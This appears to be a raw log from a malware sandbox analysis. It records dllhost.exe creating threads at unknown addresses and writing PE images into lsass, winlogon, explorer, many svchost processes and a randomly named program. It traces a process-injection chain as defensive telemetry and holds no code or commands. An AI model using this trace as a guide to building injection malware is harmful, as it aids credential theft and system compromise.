Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F1CD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7AD72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F1602EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A172EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C5302EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B2A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 84182EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C5612EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 63AD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25DC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC902EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 137C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E102EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 98572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CFCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15D32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B1242EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 82CD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 61412EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ADC42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3CB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 997D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 20425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8C182EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BF652EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8F262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 91C92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E402EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2462EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CEB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A5972EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A59A2EBC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1EB0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287A7D0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFC900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24261410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1C7ADC40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 242997D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2910000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 15E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A30000 value starts with: 4D5A
